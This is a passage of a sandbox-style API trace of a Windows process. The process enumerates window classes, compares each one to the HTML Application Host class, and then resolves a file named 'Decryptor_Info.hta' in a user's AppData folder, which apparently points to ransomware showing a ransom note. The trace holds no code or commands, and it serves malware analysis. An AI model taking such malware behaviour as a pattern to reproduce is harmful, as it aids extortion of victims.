lpClassName="gmailnotifierproapp") returned 19 [0112.945] StrCmpW (psz1="gmailnotifierproapp", psz2="HTML Application Host Window Class") returned -1 [0112.946] GetWindow (hWnd=0x101d8, uCmd=0x2) returned 0x101da [0112.946] GetClassNameW (in: hWnd=0x101da, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.946] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.946] GetWindow (hWnd=0x101da, uCmd=0x2) returned 0x101d4 [0112.946] GetClassNameW (in: hWnd=0x101d4, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="foxmailincmailwin") returned 17 [0112.946] StrCmpW (psz1="foxmailincmailwin", psz2="HTML Application Host Window Class") returned -1 [0112.946] GetWindow (hWnd=0x101d4, uCmd=0x2) returned 0x101d6 [0112.946] GetClassNameW (in: hWnd=0x101d6, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.946] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.946] GetWindow (hWnd=0x101d6, uCmd=0x2) returned 0x101d0 [0112.946] GetClassNameW (in: hWnd=0x101d0, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="flingwin") returned 8 [0112.946] StrCmpW (psz1="flingwin", psz2="HTML Application Host Window Class") returned -1 [0112.947] GetWindow (hWnd=0x101d0, uCmd=0x2) returned 0x101d2 [0112.947] GetClassNameW (in: hWnd=0x101d2, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.947] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.947] GetWindow (hWnd=0x101d2, uCmd=0x2) returned 0x101cc [0112.947] GetClassNameW (in: hWnd=0x101cc, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="flashfxp_app") returned 12 [0112.947] StrCmpW (psz1="flashfxp_app", psz2="HTML Application Host Window Class") returned -1 [0112.947] GetWindow (hWnd=0x101cc, uCmd=0x2) returned 0x101ce [0112.947] GetClassNameW (in: hWnd=0x101ce, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.947] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.947] GetWindow (hWnd=0x101ce, uCmd=0x2) returned 0x101c8 [0112.947] GetClassNameW (in: hWnd=0x101c8, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="filezilla") returned 9 [0112.947] StrCmpW (psz1="filezilla", psz2="HTML Application Host Window Class") returned -1 [0112.947] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x101ca [0112.948] GetClassNameW (in: hWnd=0x101ca, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.948] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.948] GetWindow (hWnd=0x101ca, uCmd=0x2) returned 0x101c4 [0112.948] GetClassNameW (in: hWnd=0x101c4, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="farclass") returned 8 [0112.948] StrCmpW (psz1="farclass", psz2="HTML Application Host Window Class") returned -1 [0112.948] GetWindow (hWnd=0x101c4, uCmd=0x2) returned 0x101c6 [0112.948] GetClassNameW (in: hWnd=0x101c6, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.949] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.949] GetWindow (hWnd=0x101c6, uCmd=0x2) returned 0x101c0 [0112.949] GetClassNameW (in: hWnd=0x101c0, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="coreftpwin") returned 10 [0112.949] StrCmpW (psz1="coreftpwin", psz2="HTML Application Host Window Class") returned -1 [0112.949] GetWindow (hWnd=0x101c0, uCmd=0x2) returned 0x101c2 [0112.949] GetClassNameW (in: hWnd=0x101c2, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.949] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.949] GetWindow (hWnd=0x101c2, uCmd=0x2) returned 0x101bc [0112.949] GetClassNameW (in: hWnd=0x101bc, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="bitkinexwindow") returned 14 [0112.950] StrCmpW (psz1="bitkinexwindow", psz2="HTML Application Host Window Class") returned -1 [0112.950] GetWindow (hWnd=0x101bc, uCmd=0x2) returned 0x101be [0112.950] GetClassNameW (in: hWnd=0x101be, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.950] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.950] GetWindow (hWnd=0x101be, uCmd=0x2) returned 0x101b8 [0112.950] GetClassNameW (in: hWnd=0x101b8, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="barca_wnd") returned 9 [0112.950] StrCmpW (psz1="barca_wnd", psz2="HTML Application Host Window Class") returned -1 [0112.950] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101ba [0112.950] GetClassNameW (in: hWnd=0x101ba, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.950] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.950] GetWindow (hWnd=0x101ba, uCmd=0x2) returned 0x101b4 [0112.950] GetClassNameW (in: hWnd=0x101b4, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="alftpclass") returned 10 [0112.951] StrCmpW (psz1="alftpclass", psz2="HTML Application Host Window Class") returned -1 [0112.951] GetWindow (hWnd=0x101b4, uCmd=0x2) returned 0x101b6 [0112.951] GetClassNameW (in: hWnd=0x101b6, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.951] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.951] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101b0 [0112.951] GetClassNameW (in: hWnd=0x101b0, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="absolutetelnet_class") returned 20 [0112.951] StrCmpW (psz1="absolutetelnet_class", psz2="HTML Application Host Window Class") returned -1 [0112.951] GetWindow (hWnd=0x101b0, uCmd=0x2) returned 0x101b2 [0112.951] GetClassNameW (in: hWnd=0x101b2, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.951] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.951] GetWindow (hWnd=0x101b2, uCmd=0x2) returned 0x201ac [0112.951] GetClassNameW (in: hWnd=0x201ac, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="3dftp_") returned 6 [0112.952] StrCmpW (psz1="3dftp_", psz2="HTML Application Host Window Class") returned -1 [0112.952] GetWindow (hWnd=0x201ac, uCmd=0x2) returned 0x101ae [0112.952] GetClassNameW (in: hWnd=0x101ae, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.952] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.952] GetWindow (hWnd=0x101ae, uCmd=0x2) returned 0x101a8 [0112.952] GetClassNameW (in: hWnd=0x101a8, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="invitedptyCurrencieswin") returned 23 [0112.952] StrCmpW (psz1="invitedptyCurrencieswin", psz2="HTML Application Host Window Class") returned 1 [0112.952] GetWindow (hWnd=0x101a8, uCmd=0x2) returned 0x101aa [0112.952] GetClassNameW (in: hWnd=0x101aa, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.952] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.952] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x101a4 [0112.952] GetClassNameW (in: hWnd=0x101a4, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="box_toyota_win") returned 14 [0112.952] StrCmpW (psz1="box_toyota_win", psz2="HTML Application Host Window Class") returned -1 [0112.953] GetWindow (hWnd=0x101a4, uCmd=0x2) returned 0x101a6 [0112.953] GetClassNameW (in: hWnd=0x101a6, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.953] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.953] GetWindow (hWnd=0x101a6, uCmd=0x2) returned 0x101a0 [0112.953] GetClassNameW (in: hWnd=0x101a0, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="InnerAtomic") returned 11 [0112.953] StrCmpW (psz1="InnerAtomic", psz2="HTML Application Host Window Class") returned 1 [0112.953] GetWindow (hWnd=0x101a0, uCmd=0x2) returned 0x101a2 [0112.953] GetClassNameW (in: hWnd=0x101a2, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.953] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.953] GetWindow (hWnd=0x101a2, uCmd=0x2) returned 0x1019c [0112.953] GetClassNameW (in: hWnd=0x1019c, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="Reload") returned 6 [0112.953] StrCmpW (psz1="Reload", psz2="HTML Application Host Window Class") returned 1 [0112.953] GetWindow (hWnd=0x1019c, uCmd=0x2) returned 0x1019e [0112.953] GetClassNameW (in: hWnd=0x1019e, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.954] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.954] GetWindow (hWnd=0x1019e, uCmd=0x2) returned 0x10198 [0112.954] GetClassNameW (in: hWnd=0x10198, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="strike_grid_Ringtones_class") returned 27 [0112.954] StrCmpW (psz1="strike_grid_Ringtones_class", psz2="HTML Application Host Window Class") returned 1 [0112.954] GetWindow (hWnd=0x10198, uCmd=0x2) returned 0x1019a [0112.954] GetClassNameW (in: hWnd=0x1019a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.954] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.954] GetWindow (hWnd=0x1019a, uCmd=0x2) returned 0x10194 [0112.954] GetClassNameW (in: hWnd=0x10194, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="Omega_hiv_app") returned 13 [0112.954] StrCmpW (psz1="Omega_hiv_app", psz2="HTML Application Host Window Class") returned 1 [0112.954] GetWindow (hWnd=0x10194, uCmd=0x2) returned 0x10196 [0112.954] GetClassNameW (in: hWnd=0x10196, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.955] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.955] GetWindow (hWnd=0x10196, uCmd=0x2) returned 0x10190 [0112.955] GetClassNameW (in: hWnd=0x10190, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="ModifyvitalConsiderapp") returned 22 [0112.955] StrCmpW (psz1="ModifyvitalConsiderapp", psz2="HTML Application Host Window Class") returned 1 [0112.955] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x10192 [0112.955] GetClassNameW (in: hWnd=0x10192, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.955] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.955] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x1018a [0112.955] GetClassNameW (in: hWnd=0x1018a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="Targetedwindow") returned 14 [0112.955] StrCmpW (psz1="Targetedwindow", psz2="HTML Application Host Window Class") returned 1 [0112.955] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x1018c [0112.955] GetClassNameW (in: hWnd=0x1018c, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.955] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.956] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x10186 [0112.956] GetClassNameW (in: hWnd=0x10186, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="Morrisonconsultcls") returned 18 [0112.956] StrCmpW (psz1="Morrisonconsultcls", psz2="HTML Application Host Window Class") returned 1 [0112.956] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10188 [0112.956] GetClassNameW (in: hWnd=0x10188, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.956] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.956] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10182 [0112.956] GetClassNameW (in: hWnd=0x10182, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="Casting_window") returned 14 [0112.956] StrCmpW (psz1="Casting_window", psz2="HTML Application Host Window Class") returned -1 [0112.956] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x10184 [0112.956] GetClassNameW (in: hWnd=0x10184, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.956] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.956] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x1017e [0112.957] GetClassNameW (in: hWnd=0x1017e, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="Des_app") returned 7 [0112.957] StrCmpW (psz1="Des_app", psz2="HTML Application Host Window Class") returned -1 [0112.957] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10180 [0112.957] GetClassNameW (in: hWnd=0x10180, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.957] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.957] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x1017a [0112.957] GetClassNameW (in: hWnd=0x1017a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="dimensions_Flyer_wnd") returned 20 [0112.957] StrCmpW (psz1="dimensions_Flyer_wnd", psz2="HTML Application Host Window Class") returned -1 [0112.957] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x1017c [0112.957] GetClassNameW (in: hWnd=0x1017c, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.957] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.957] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x10176 [0112.958] GetClassNameW (in: hWnd=0x10176, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="Fighters_cls") returned 12 [0112.958] StrCmpW (psz1="Fighters_cls", psz2="HTML Application Host Window Class") returned -1 [0112.958] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10178 [0112.958] GetClassNameW (in: hWnd=0x10178, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.958] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.958] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x10172 [0112.958] GetClassNameW (in: hWnd=0x10172, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="undRicaapp") returned 10 [0112.958] StrCmpW (psz1="undRicaapp", psz2="HTML Application Host Window Class") returned 1 [0112.958] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x10174 [0112.958] GetClassNameW (in: hWnd=0x10174, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.958] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.958] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x1016e [0112.958] GetClassNameW (in: hWnd=0x1016e, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="seemwnd") returned 7 [0112.959] StrCmpW (psz1="seemwnd", psz2="HTML Application Host Window Class") returned 1 [0112.959] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10170 [0112.959] GetClassNameW (in: hWnd=0x10170, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.959] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.959] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x1016a [0112.959] GetClassNameW (in: hWnd=0x1016a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="Restructuring_") returned 14 [0112.959] StrCmpW (psz1="Restructuring_", psz2="HTML Application Host Window Class") returned 1 [0112.959] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x1016c [0112.959] GetClassNameW (in: hWnd=0x1016c, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.959] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.959] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x30164 [0112.959] GetClassNameW (in: hWnd=0x30164, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="Expensewindow") returned 13 [0112.959] StrCmpW (psz1="Expensewindow", psz2="HTML Application Host Window Class") returned -1 [0112.959] GetWindow (hWnd=0x30164, uCmd=0x2) returned 0x10168 [0112.959] GetClassNameW (in: hWnd=0x10168, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.959] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.959] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x30158 [0112.960] GetClassNameW (in: hWnd=0x30158, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0112.960] StrCmpW (psz1="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}", psz2="HTML Application Host Window Class") returned -1 [0112.960] GetWindow (hWnd=0x30158, uCmd=0x2) returned 0x1014e [0112.960] GetClassNameW (in: hWnd=0x1014e, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0112.960] StrCmpW (psz1="BluetoothNotificationAreaIconWindowClass", psz2="HTML Application Host Window Class") returned -1 [0112.960] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x1014c [0112.960] GetClassNameW (in: hWnd=0x1014c, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0112.960] StrCmpW (psz1="MS_WebcheckMonitor", psz2="HTML Application Host Window Class") returned 1 [0112.960] GetWindow (hWnd=0x1014c, uCmd=0x2) returned 0x20142 [0112.960] GetClassNameW (in: hWnd=0x20142, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0112.960] StrCmpW (psz1="PNIHiddenWnd", psz2="HTML Application Host Window Class") returned 1 [0112.960] GetWindow (hWnd=0x20142, uCmd=0x2) returned 0x10136 [0112.960] GetClassNameW (in: hWnd=0x10136, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="Media Center SSO") returned 16 [0112.960] StrCmpW (psz1="Media Center SSO", psz2="HTML Application Host Window Class") returned 1 [0112.960] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x10138 [0112.960] GetClassNameW (in: hWnd=0x10138, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.960] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.960] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1012e [0112.960] GetClassNameW (in: hWnd=0x1012e, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="ATL:000007FEFBF641F0") returned 20 [0112.961] StrCmpW (psz1="ATL:000007FEFBF641F0", psz2="HTML Application Host Window Class") returned -1 [0112.961] GetWindow (hWnd=0x1012e, uCmd=0x2) returned 0x10130 [0112.961] GetClassNameW (in: hWnd=0x10130, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.961] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.961] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10124 [0112.961] GetClassNameW (in: hWnd=0x10124, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0112.961] StrCmpW (psz1="SystemTray_Main", psz2="HTML Application Host Window Class") returned 1 [0112.961] GetWindow (hWnd=0x10124, uCmd=0x2) returned 0x10126 [0112.961] GetClassNameW (in: hWnd=0x10126, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.961] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.961] GetWindow (hWnd=0x10126, uCmd=0x2) returned 0x200d6 [0112.961] GetClassNameW (in: hWnd=0x200d6, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0112.961] StrCmpW (psz1="WorkerW", psz2="HTML Application Host Window Class") returned 1 [0112.961] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200a8 [0112.961] GetClassNameW (in: hWnd=0x200a8, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0112.961] StrCmpW (psz1="TASKENGINEWINDOWCLASS", psz2="HTML Application Host Window Class") returned 1 [0112.961] GetWindow (hWnd=0x200a8, uCmd=0x2) returned 0x10110 [0112.961] GetClassNameW (in: hWnd=0x10110, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.961] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.962] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x1010c [0112.962] GetClassNameW (in: hWnd=0x1010c, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0112.962] StrCmpW (psz1="WorkerW", psz2="HTML Application Host Window Class") returned 1 [0112.962] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x1010a [0112.962] GetClassNameW (in: hWnd=0x1010a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0112.962] StrCmpW (psz1="MSCTFIME UI", psz2="HTML Application Host Window Class") returned 1 [0112.962] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x10108 [0112.962] GetClassNameW (in: hWnd=0x10108, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0112.962] StrCmpW (psz1="WorkerW", psz2="HTML Application Host Window Class") returned 1 [0112.962] GetWindow (hWnd=0x10108, uCmd=0x2) returned 0x10102 [0112.962] GetClassNameW (in: hWnd=0x10102, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0112.962] StrCmpW (psz1="WorkerW", psz2="HTML Application Host Window Class") returned 1 [0112.962] GetWindow (hWnd=0x10102, uCmd=0x2) returned 0x50094 [0112.962] GetClassNameW (in: hWnd=0x50094, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0112.962] StrCmpW (psz1="DV2ControlHost", psz2="HTML Application Host Window Class") returned -1 [0112.962] GetWindow (hWnd=0x50094, uCmd=0x2) returned 0x1008a [0112.962] GetClassNameW (in: hWnd=0x1008a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0112.962] StrCmpW (psz1="WorkerW", psz2="HTML Application Host Window Class") returned 1 [0112.962] GetWindow (hWnd=0x1008a, uCmd=0x2) returned 0x10088 [0112.963] GetClassNameW (in: hWnd=0x10088, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0112.963] StrCmpW (psz1="WorkerW", psz2="HTML Application Host Window Class") returned 1 [0112.963] GetWindow (hWnd=0x10088, uCmd=0x2) returned 0x10084 [0112.963] GetClassNameW (in: hWnd=0x10084, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0112.964] StrCmpW (psz1="COMTASKSWINDOWCLASS", psz2="HTML Application Host Window Class") returned -1 [0112.964] GetWindow (hWnd=0x10084, uCmd=0x2) returned 0x10086 [0112.964] GetClassNameW (in: hWnd=0x10086, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.964] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.964] GetWindow (hWnd=0x10086, uCmd=0x2) returned 0x1007c [0112.965] GetClassNameW (in: hWnd=0x1007c, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0112.965] StrCmpW (psz1="tooltips_class32", psz2="HTML Application Host Window Class") returned 1 [0112.965] GetWindow (hWnd=0x1007c, uCmd=0x2) returned 0x1006a [0112.965] GetClassNameW (in: hWnd=0x1006a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0112.965] StrCmpW (psz1="tooltips_class32", psz2="HTML Application Host Window Class") returned 1 [0112.965] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x20020 [0112.965] GetClassNameW (in: hWnd=0x20020, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="#43") returned 3 [0112.965] StrCmpW (psz1="#43", psz2="HTML Application Host Window Class") returned -1 [0112.965] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2002a [0112.965] GetClassNameW (in: hWnd=0x2002a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.965] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.965] GetWindow (hWnd=0x2002a, uCmd=0x2) returned 0x10066 [0112.965] GetClassNameW (in: hWnd=0x10066, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0112.965] StrCmpW (psz1="NotifyIconOverflowWindow", psz2="HTML Application Host Window Class") returned 1 [0112.965] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10052 [0112.965] GetClassNameW (in: hWnd=0x10052, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0112.966] StrCmpW (psz1="OleDdeWndClass", psz2="HTML Application Host Window Class") returned 1 [0112.966] GetWindow (hWnd=0x10052, uCmd=0x2) returned 0x1004a [0112.966] GetClassNameW (in: hWnd=0x1004a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0112.966] StrCmpW (psz1="DDEMLEvent", psz2="HTML Application Host Window Class") returned -1 [0112.966] GetWindow (hWnd=0x1004a, uCmd=0x2) returned 0x20046 [0112.966] GetClassNameW (in: hWnd=0x20046, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0112.966] StrCmpW (psz1="DDEMLMom", psz2="HTML Application Host Window Class") returned -1 [0112.966] GetWindow (hWnd=0x20046, uCmd=0x2) returned 0x10048 [0112.966] GetClassNameW (in: hWnd=0x10048, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.966] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.966] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x30044 [0112.966] GetClassNameW (in: hWnd=0x30044, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0112.966] StrCmpW (psz1="Dwm", psz2="HTML Application Host Window Class") returned -1 [0112.966] GetWindow (hWnd=0x30044, uCmd=0x2) returned 0x2001a [0112.966] GetClassNameW (in: hWnd=0x2001a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.966] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.966] GetWindow (hWnd=0x2001a, uCmd=0x2) returned 0x20018 [0112.966] GetClassNameW (in: hWnd=0x20018, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0112.967] StrCmpW (psz1="CicLoaderWndClass", psz2="HTML Application Host Window Class") returned -1 [0112.967] GetWindow (hWnd=0x20018, uCmd=0x2) returned 0x100f2 [0112.967] GetClassNameW (in: hWnd=0x100f2, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0112.967] StrCmpW (psz1="Progman", psz2="HTML Application Host Window Class") returned 1 [0112.967] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x0 [0112.967] IUnknown:AddRef (This=0x47c5c4) returned 0x4 [0112.967] IUri:GetScheme (in: This=0x47c5c4, pdwScheme=0x22c7d4 | out: pdwScheme=0x22c7d4*=0x9) returned 0x0 [0112.967] IUnknown:QueryInterface (in: This=0x47c5c4, riid=0x73d8d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x22c7b4 | out: ppvObject=0x22c7b4*=0x47c5c4) returned 0x0 [0112.967] IUnknown:Release (This=0x47c5c4) returned 0x4 [0112.967] IUnknown:AddRef (This=0x47c5c4) returned 0x5 [0112.967] PathCreateFromUrlW (in: pszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pszPath=0x22c808, pcchPath=0x22c7e8, dwFlags=0x0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta", pcchPath=0x22c7e8) returned 0x0 [0112.968] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x86) returned 0x4a2bd0 [0112.968] IUnknown:Release (This=0x47c5c4) returned 0x4 [0112.968] GetWindowTextW (in: hWnd=0x301f0, lpString=0x22c380, nMaxCount=512 | out: lpString="") returned 0 [0112.968] NtdllDefWindowProc_W () returned 0x0 